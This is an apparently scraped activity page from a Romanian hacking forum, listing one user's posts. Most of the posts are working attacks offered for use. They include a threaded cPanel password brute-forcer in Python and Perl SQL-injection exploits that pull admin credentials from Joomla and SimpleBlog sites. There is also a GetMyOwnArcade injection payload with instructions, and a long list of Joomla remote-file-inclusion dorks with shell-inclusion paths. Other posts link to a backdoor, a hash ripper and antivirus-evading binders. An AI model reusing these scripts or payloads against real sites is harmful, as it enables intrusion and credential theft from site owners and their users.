value[0][:-1] else: return users[0][:-1], value[0][:-1] def getauth(url): req = urllib2.Request(url) try: handle = urllib2.urlopen(req) except IOError, e: pass else: print "This page isn't protected by basic authentication.\n" sys.exit(1) if not hasattr(e, 'code') or e.code != 401: print "\nThis page isn't protected by basic authentication." print 'But we failed for another reason.\n' sys.exit(1) authline = e.headers.get('www-authenticate', '') if not authline: print '\nA 401 error without a basic authentication response header - very weird.\n' sys.exit(1) else: return authline class Worker(threading.Thread): def run(self): username, password = getword() try: print "-"*12 print "User:",username,"Password:",password auth_handler = urllib2.HTTPBasicAuthHandler() auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1]) opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) urllib2.urlopen(server) print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n" except (urllib2.HTTPError, httplib.BadStatusLine), msg: #print "An error occurred:", msg pass title() if sys.argv[1][-1] == "/": sys.argv[1] = sys.argv[1][:-1] server = sys.argv[1]+":2082" if sys.argv[2].isdigit() == False: print "[-] Port must be a number\n" sys.exit(1) else: port = sys.argv[2] if sys.argv[1][-1] == "/": sys.argv[1] = sys.argv[1][:-1] server = sys.argv[1]+":"+port print "[+] Server:",server print "[+] Port:",port print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words) print "[+]",getauth(server) print "[+] Started",timer(),"\n" for i in range(len(words)*len(users)): work = Worker() work.setDaemon(1) work.start() time.sleep(1) print "\n[-] Done -",timer(),"\n"
  6. Ras
    It's called "SQLRIP" and it's for ripping informations like the username, mail address and the hash from an SQL Database. It supports phpBB, Woltlab Burning Board, Simple Machines Forum, vBulletin, PHPKit and webspell. Download: http://rapidshare.com/files/51383363/SQLRIP.rar
  7. Ras
    Vedeti ca in arhiva este un fisier .txt, cititi ce scrie in el. Eu nu am inteles mai nimic... cum sa folosesc... daca intelegeti careva si testati sa imi explicati si mie daca vreti. Download: http://rapidshare.com/files/51381520/VNC_Mini-Backdoor.rar
  8. Ras
    #!/usr/bin/perl -w #(C)oded by illuz1oN use LWP::UserAgent; { print "[*]Site To Attack: "; chomp($site=<STDIN>); my $www = new LWP::UserAgent; my $exploit="$site/index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*"; my $xpl = $www->get($exploit) or vuln(); $xpl->content()=~/([0-9,a-f]{32})/ or vuln(); print "\n[*]Hash Is: $1\n"; } sub vuln { print qq[\n/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ /~~~~~~~~~Site Was Not Vulnerable~~~~~~~/ /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ ]; exit; }
  9. Ras
    click dreapta pentru a vedea meniul... deocamdata este 100% nedetectabil. Download: http://rapidshare.com/files/51088659/Useless.rar
  10. Ras
    :::::::::::::::::::::::::::::::::::::::::::::::::::..................... .. : \ | (_) | \ | | / ____| : \| |_ ___ ___ | \| | __ _ _ __ ___ ___ | | _ __ _____ __ : . ` | |/ __/ _ \ | . ` |/ _` | '_ ` _ \ / _ \ | | | '__/ _ \ \ /\ / / : |\ | | (_| __/ | |\ | (_| | | | | | | __/ | |____| | | __/\ V V / :_| \_|_|\___\___| |_| \_|\__,_|_| |_| |_|\___| \_____|_| \___| \_/\_/ :::::::::::::::::::::::::::::We got the nicest name in the security scene! ::::::::Info::. ::Script: phpress ::Version: 0.2.0 ::Homepage:[url]http://sourceforge.net/projects/phpress/[/url] :: :::::::::Details::. ::Type: Remote_File_Inclusion ::Dork: allinurl:/phpress/ ::Exploit: [url]http://host/phpress/adisplay.php?lang=shell[/url] :: :: ::Variable lang is not defined :: ::::::::::::::::::::::::::::::::. :::::::::::Additional_Information::. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::. ::Contact: cerbelum@xxxxxxxxx ::Website: none yet :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
  11. Ras
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++ SPIP v1.7 Remote File Inclusion Bug ! ++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ------------------------------------------------------------------------------------ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ ++DORK : "/SPIP-v1-7-2/" ++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +----------------------------------------------------------------------------------+ +----------------------------------------------------------------------------------+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ ++ Bug in : "SPIP-v1-7r/inc-calcul.php3" ++---------------------------------------------------------------------------------- ++ Vlu Code: ----------------------------- ++ || include($squelette_cache); || ++ ----------------------------- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ ++================================================================================== ++ Exploit : ++ ++ [url]http://sitename.com/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://SHELLURL?[/url] ++ ++================================================================================== ++ +++++++++++++++++++++|Discoverd By :Darkdewil[system-errrror]|++++++++++++++++++++++ ++ ++ ++++++++++++++++++|Conatact : system-errrror[at]hotmail[dot]com |+++++++++++++++++++ ++ ++ ++++++++++++|Thx To :Cazanova & fedaiturk & n3twork & codes & by_Ka0s |+++++++++++++ ++ ++ ++++++++++++++++++++++++|sPECial THanks to :1923turk - grup|++++++++++++++++++++++++ ++ ++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  12. Ras

    Sunt prost

    Ras replied to a topic in Cosul de gunoi

    nemessis ce ai tata? ai baut? mai gresesc si oamenii EDIT ti s-a pus pata pe tine.
  13. Ras

    RFI joomla Dorks

    Ras posted a topic in Exploituri

    inurl:"com_flyspray" Site Sonuna: /components/com_flyspray/startdown.php?file=shell Google Dork: inurl:"com_admin" Site Sonuna: administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell Google Dork: inurl:index.php?option=com_simpleboard Site Sonuna: /components/com_simpleboard/file_upload.php?sbp=shell Google Dork: inurl:"com_hashcash" Site Sonuna: /components/com_hashcash/server.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_htmlarea3_xtd-c" Code: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_sitemap" Code: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_performs" Site Sonuna: components/com_performs/performs.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_forum" Site Sonuna: /components/com_forum/download.php?phpbb_root_path= Google Dork: inurl:"com_pccookbook" Site Sonuna: components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell Google Dork: inurl:index.php?option=com_extcalendar Site Sonuna: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell Google Dork: inurl:"minibb" Site Sonuna: components/minibb/index.php?absolute_path=shell Google Dork: inurl:"com_smf" Site Sonuna: /components/com_smf/smf.php?mosConfig_absolute_path= Site Sonuna2: /modules/mod_calendar.php?absolute_path=shell Google Dork: inurl:"com_pollxt" Site Sonuna: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_loudmounth" Site Sonuna: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_videodb" Site Sonuna: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shell Google Dork: inurl:index.php?option=com_pcchess Site Sonuna: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_multibanners" Site Sonuna: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_a6mambohelpdesk" Site Sonuna: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shell Google Dork: inurl:"com_colophon" Site Sonuna: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_mgm" Site Sonuna: administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_mambatstaff" Site Sonuna: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_securityimages" Site Sonuna: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell Site Sonuna2: /components/com_securityimages/lang.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_artlinks" Site Sonuna: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_galleria" Site Sonuna: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_akocomment" Site Sonuna: /akocomments.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_cropimage" Site Sonuna: administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell Google Dork: inurl:"com_kochsuite" Site Sonuna: /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_comprofiler" Site Sonuna: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_zoom" Site Sonuna: /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell Site Sonuna2: /components/com_zoom/includes/database.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_serverstat" Site Sonuna: /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_fm" Site Sonuna: components/com_fm/fm.install.php?lm_absolute_path=shell Google Dork: inurl:com_mambelfish Site Sonuna: administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell
  14. Ras

    hmm masina

    Ras replied to zbeng's topic in Off-topic

    clar audi
  15. Ras
    Si versiunea unpaked Download: http://rapidshare.com/files/50142975/SkD_Undetectabler_v3__unpaked_.rar scuze ca fac dublu post.
  16. Ras

    ziua

    Ras replied to nos's topic in Off-topic

    la multi ani
  17. Ras
    hnLab-V3 2007.8.18.0 2007.08.17 - AntiVir 7.4.1.62 2007.08.17 - Authentium 4.93.8 2007.08.17 - Avast 4.7.1029.0 2007.08.17 - AVG 7.5.0.484 2007.08.17 - BitDefender 7.2 2007.08.17 - CAT-QuickHeal 9.00 2007.08.17 - ClamAV 0.91 2007.08.18 - DrWeb 4.33 2007.08.18 - eSafe 7.0.15.0 2007.08.16 - eTrust-Vet 31.1.5069 2007.08.18 - Ewido 4.0 2007.08.17 - FileAdvisor 1 2007.08.18 - Fortinet 2.91.0.0 2007.08.18 - F-Prot 4.3.2.48 2007.08.17 - F-Secure 6.70.13030.0 2007.08.17 - Ikarus T3.1.1.12 2007.08.17 - Kaspersky 4.0.2.24 2007.08.18 - McAfee 5100 2007.08.17 - Microsoft 1.2803 2007.08.18 - NOD32v2 2469 2007.08.18 - Norman 5.80.02 2007.08.17 - Panda 9.0.0.4 2007.08.17 - Prevx1 V2 2007.08.18 - Rising 19.36.50.00 2007.08.18 - Sophos 4.20.0 2007.08.12 - Sunbelt 2.2.907.0 2007.08.18 - Symantec 10 2007.08.18 - TheHacker 6.1.8.170 2007.08.17 - VBA32 3.12.2.2 2007.08.17 - VirusBuster 4.3.26:9 2007.08.17 - Webwasher-Gateway 6.0.1 2007.08.17 - Download: http://rapidshare.com/files/50116289/aver.rar
  18. Ras
    Shot at 2007-08-20 Download: http://rapidshare.com/files/50112070/Aholic_Binder_FullyUndetected.rar
  19. Ras
    14 Sep 2006 << topicul este cam vechi
  20. Ras
    ############################################### ### GetMyOwnArcade (search.php) ($query) SQL-Injection ############################################### ### Discovered By: RoXur777 ### ***August 11th 2007 ### Google-Dork: "Powered by GetMyOwnArcade" ############################################### /* * $query is not being filtered before getting passed to a query. * Therefore, we can inject SQL code into the SQL-Query. * Using UNION-SELECT we can obtain member information. */ ### ## #Straight-Forward: ##################### ### POST ### search.php ###"query=')/**/union/**/select/**/0,0,0,username,0,0,0,0,0,password,0,0,0,0,0,0,0,0/**/from/**/getmyown_user/*" ##################### ### ## # If you did not understand the Straight-Forward version of the exploit then read this: ### # 1) Use the search function on a GetMyOwnAracde site. (They are not always visible on index.php) 2) In the search field type: # ####### ')/**/union/**/select/**/0,0,0,username,0,0,0,0,0,password,0,0,0,0,0,0,0,0/**/from/**/getmyown_user/* ####### # 3) Click Enter. 4) If exploitation was successful you should see usernames and passwords instead of the search results. --- However if you see: # ####### Game search result for \')/**/union/**/....... ####### # That means that the exploit failed. #
  21. Ras
    Download: http://rapidshare.com/files/50045225/SkDUndetectabler3.rar
  22. Ras
    ia-l cu un download manager... damn nu mi-a trecut prin cap ;D
  23. Ras
    am intrat pe link-ul ala si imi arata multe caractere sau ce or fii alea M?!TwQ?OkjN??;?p"?3?-^q p?-???%@?K?X?Wcl?PN?6H,x????'D?s?ak??vdh6] ? ?2/ ??}t?ky??$???e?>%??`=??V??ic?Xq^??0z~>S?&P?+?e^?L?uv 8hS?[?VaELF?m??<?l?NPiti2X=y!????k??'v?o".???E? +??
  24. Ras

    Hi !

    Ras replied to LeOCruX's topic in Bine ai venit

    salut. daca ai nevoie de ajutor da-mi pm
  25. Ras
    #!/usr/bin/perl #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# # SimpleBlog <= 3.0 [ comments_get.asp ] # # ] Remote SQL Injection [ # # # # [c]ode by TrinTiTTY [at] g00ns.net # # Vulnerability by MurderSkillz # # # # shoutz: murderskillz, z3r0, kat, str0ke, wicked, clorox # # ch0wn, a59, sess, bernard, + the rest of g00ns # # [irc.g00ns.net] [[url]www.g00ns.net][/url] [ts.g00ns.net] # #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# use LWP::UserAgent; $host = @ARGV[0]; $ua = LWP::UserAgent->new; my $inject = 'comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS'; if (@ARGV < 1){&top( );&usage( )} elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );} else { &xpl( ) } sub xpl( ) { &top( ); print "\n [~] Connecting\n"; $res = $ua->get("http://$host/$inject"); $con = $res->content; print "\n [~] Checking for admin info\n"; if ($con =~ /[b]([-_+.\w]{1,15})<\/strong>/gmi) { print "\n\t [+] Admin user: $1\n"; } if ($con =~ /<a href\=\"http:\/\/(.*)\" target\=\"\_blank\">(.*)<\/a>/gmi) { print "\n\t [+] Admin password: $2\n"; print "\n [+] Complete\n"; } else { print "\n [-] Unable to retrieve admin info\n"; exit(0); } } sub top( ) { print q { ################################################################## # SimpleBlog <= 3.0 [ comments_get.asp ] # # ] Remote SQL Injection [ # # # # [c]ode by TrinTiTTY [at] g00ns.net # # Vulnerability by MurderSkillz # ################################################################## } } sub usage( ) { print "\n Usage: perl simpleblog3.pl <host>\n"; print "\n Example: perl simpleblog3.pl www.example.com/path\n\n"; exit(0); }
×
×
  • Create New...